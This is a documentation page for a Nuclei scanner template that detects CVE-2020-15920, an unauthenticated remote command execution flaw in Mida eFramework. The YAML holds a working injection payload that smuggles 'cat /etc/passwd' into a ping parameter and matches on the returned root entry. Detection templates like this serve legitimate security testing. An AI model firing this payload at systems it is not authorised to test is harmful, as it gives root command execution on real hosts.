Skip to content
Nuclei Templates

Mida eFramework <=2.9.0 - Remote Command Execution

ID: CVE-2020-15920

Severity: critical

Author: dwisiswant0

Tags: cve2020,cve,mida,rce,packetstorm,midasolutions

Description

Section titled “Description”

Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.

YAML Source

Section titled “YAML Source”
id: CVE-2020-15920


info:
  name: Mida eFramework <=2.9.0 - Remote Command Execution
  author: dwisiswant0
  severity: critical
  description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability.
  reference:
    - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
    - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15920
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15920
    cwe-id: CWE-78
    epss-score: 0.9722
    epss-percentile: 0.998
    cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: midasolutions
    product: eframework
  tags: cve2020,cve,mida,rce,packetstorm,midasolutions


http:
  - method: POST
    path:
      - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 490a0046304402207d45a5b1b4e5e08f6c1ac5ce8bfa100579ad8700faf3ef66f1cbd8de312c8fb002201ca8b31906a1f6a645abe4495315efe1b892450026fc519f80bbe4cb7bb542fc:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-15920.yaml"

View on Github